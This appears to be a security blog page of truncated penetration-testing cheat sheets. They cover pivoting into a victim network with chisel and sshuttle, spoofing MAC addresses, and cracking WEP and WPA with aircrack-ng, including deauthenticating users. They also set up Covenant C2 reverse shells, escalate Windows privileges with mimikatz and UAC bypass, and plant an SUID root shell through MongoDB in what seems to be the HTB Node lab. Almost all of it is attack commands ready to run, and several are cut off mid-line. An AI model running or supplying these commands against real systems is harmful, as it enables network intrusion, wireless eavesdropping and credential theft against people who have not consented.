Steinz Security

    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 or ./chisel server --port 9001 -reverse #On Victim ./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks .\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #If the above doesnt work #asuming Kali and windows are on Eht0 #add a firewall rule to allow Kali ip traffic netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP #on Kali - Allow tun0 traffic to forward on iptables sudo iptables -P FORWARD ACCEPT s...

    Change Your MAC Address macchanger -m aa:bb:cc:11:22:33:44 wlan or ifconfig eth0 hw ether aa:bb:cc:11:22:33:44 ifconfig eth0 up Cracking WEP #Start Monitor Mode airmon-ng start wlan0 #Search for Wireless Networks and copy the BSSID airodump-ng wlan0mon #Start capturing IV Packets and do not close it airodump-ng --bssid 00:11:22:33:44:55:66 -c 1 wlan0mon -w PacketCapture #Crack the password aircrack-ng PacketCapture.cap Cracking WPA/WPA2 PSK WPA/WPA2 PSK works on pre authentication key, so we need to capture the handshake when the authentication happens. service network-manager stop #Start Monitor Mode airmon-ng start wlan0 #Search for Wireless Networks and copy the BSSID airodump-ng wlan0mon #Start capturing IV Packets and do not close it airodump-ng --bssid 00:11:22:33:44:55:66 -c 1 wlan0mon -w wpadump #De-authenticate the already connected user or wait for some one to reconnect to the network aireplay-ng --deauth 50 -a router_MAC_Address -h Victim_MAC_Station wlan0mon...

    Installing Covenant C2 git clone --recurse-submodules https://github.com/cobbr/Covenant.git wget -q https://packages.microsoft.com/config/ubuntu/19.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb sudo dpkg -i packages-microsoft-prod.debsudo apt-get updatesudo apt-get install apt-transport-httpssudo apt-get updatesudo apt-get install dotnet-sdk-3.1 cd Covenant/Covenant dotnet build Start Covenant C2 cd Covenant/Covenant sudo dotnet run browse to https://127.0.0.1:7443/ Create a listener first Create a launcher - select the type of launcher Select the parameters Move to the hosts tab to give a name to your reverse shell and copy the command   After you get a shell, a Grunt will appear in your Grunts section Open the grunt and go to interact tab to interact with the target Commands : Runs Privilege escallation commands to find vulnerabilities - SharpUp audit use ShellCmd to run cmd commands Ex: ShellCmd dir c:\users\ Upload a Powershell script PowerShellIm...

Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackmapexec - cheatsheet  

   Here are some basic mongo db commands #List Databases show dbs #Select DB use database_name #List Collections (rows & Columns in sql) show collections #list the items in a collection db.collection_name.find(); db.users.find(); db.users.find().forEach(printjson) Exploiting MongoDB - HTB Node find creds in app.js example: mongodb://usernameLpassword@localhost:port/.......=DEFAULT&authSource=databasename'; mongo -p -u username DBName //Creating SUID db.TableName.insert({"cmd" : "cp /bin/dash /tmp/filename; chmod 6755 /bin/dash;chmod u+s /tmp/filename"}) db.TableName.find() //run with privs /tmp/filename -p